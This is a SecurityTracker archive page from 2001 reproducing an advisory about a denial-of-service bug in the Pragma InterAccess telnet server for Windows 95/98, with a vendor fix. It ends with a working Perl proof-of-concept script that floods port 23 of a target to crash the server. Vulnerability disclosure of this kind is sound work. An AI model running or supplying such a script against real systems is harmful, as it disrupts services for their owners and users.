SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Generic)  >   Pragma TelnetServer (formerly InterAccess) Vendors:   Pragma Systems
Pragma InterAccess Telnet Server for Windows 95/98 Lets Remote Users Crash the Server
SecurityTracker Alert ID:  1001673
SecurityTracker URL:  http://securitytracker.com/id/1001673
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Jun 6 2001
Original Entry Date:  Jun 4 2001
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): Release 4.0 Build 5; prior versions may also be vulnerable
Description:   DHC warned of a vulnerability in the Pragma InterAccess telnet server that allows remote users to cause the server to crash.

Pragma InterAccess reportedly provides several daemons, such as telnet, rexecd and rshd for Windows 95/98 platforms.

It is reported that if a remote user sends a burst of 15000 characters to port 23, Interaccess will crash with the following error message:

Telnet95 has caused an error to occur in telnet95.exe

A demonstration exploit script is included in the Source Message.
Impact:   A remote user can cause the telnet server process to crash.
Solution:   Install Pragma InterAccess Release 4.0 Build 6.
Vendor URL:  www.pragmasys.com/ (Links to External Site)
Cause:   Boundary error, Exception handling error
Underlying OS:   Windows (95), Windows (98)

Message History:   None.

 Source Message Contents
Date:  Mon, 04 Jun 2001 09:41:49 -0400
Subject:  Advisory for Pragma InterAccess


 [ Advisory for Pragma InterAccess                 ]
 [ Pragma InterAccess is made by Pragma Systems    ]
 [ Site: http://www.pragmasys.com                  ]
 [ by nemesystm of the DHC                         ]
 [ (http://dhcorp.cjb.net - neme-dhc@hushmail.com) ]
 [ ADV-0119                                        ]

/-|=[explanation]=|-\
Pragma InterAccess provides daemons like telnet, 
rexecd and rshd for the Windows environment. It is
vulnerable to a denial of service.

/-|=[who is vulnerable]=|-\
Pragma InterAccess Release 4.0 Build 5
has been tested and was vulnerable. Prior versions
are assumed to be vulnerable as well.

/-|=[testing it]=|-\
Sending a burst of characters with a length of 
15000 to port 23 Interaccess will crash with:
Telnet95 has caused an error to occur in 
telnet95.exe

I have made a perl script that exploits this. It is
at the bottom of this advisory.

/-|=[fix]=|-\
Install Pragma InterAccess Release 4.0 Build 6.

#!/usr/bin/perl
#
# PI.PL - Crashes Pragma Interaccess 4.0 Server
# Written by nemesystm of the DHC
# http://dhcorp.cjb.net - neme-dhc@hushmail.com
#
####
use Socket;

die "$0 - Crashes Pragma Interaccess 4.0 Server.
written by nemesystm of the DHC
http://dhcorp.cjb.net - neme-dhc\@hushmail.com
usage: perl $0 target.com\n" if !defined $ARGV[0];

$serverIP = inet_aton($ARGV[0]);
$serverAddr = sockaddr_in(23, $serverIP);
socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect (CLIENT, $serverAddr)) {
        for ($count = 0; $count <= 15000; $count++) {
                send (CLIENT, "A",0);
        }
        close (CLIENT);
} else { die "Can't connect.\n"; }
print "Done.\n";


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC